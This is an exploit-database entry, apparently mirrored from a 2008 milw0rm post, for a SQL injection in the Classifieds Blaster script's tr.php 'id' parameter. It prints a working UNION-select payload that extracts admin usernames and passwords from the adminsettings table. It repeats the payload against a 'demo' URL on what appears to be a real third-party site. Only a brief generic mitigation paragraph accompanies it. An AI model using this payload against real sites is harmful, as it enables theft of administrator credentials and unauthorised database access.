header-logo
Suggest Exploit
vendor:
Classifieds Blaster
by:
Hussin X
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Classifieds Blaster
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Classifieds Blaster (id) Remote SQL Injection Vulnerability

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'id' parameter to 'tr.php' script. A remote attacker can execute arbitrary SQL commands in application's database and gain access to sensitive information. For example, an attacker can execute the following SQL query: tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before passing to the SQL query. It is also recommended to use stored procedures and parameterized queries.
Source

Exploit-DB raw data:

Classifieds Blaster ( id ) Remote SQL Injection Vulnerability
___________________________________

Author: Hussin X

Home :  www.IQ-TY.com  & www.TrYaG.cc

___________________________________

script    : http://www.yourfreeworld.com/script/classifiedsblaster.php

DorK   : :)

Exploit :
_______

tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--


Demo :
_______

http://www.downlinegoldmine.com/classifiedsblaster/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--





Greetz : All my freind

# milw0rm.com [2008-11-01]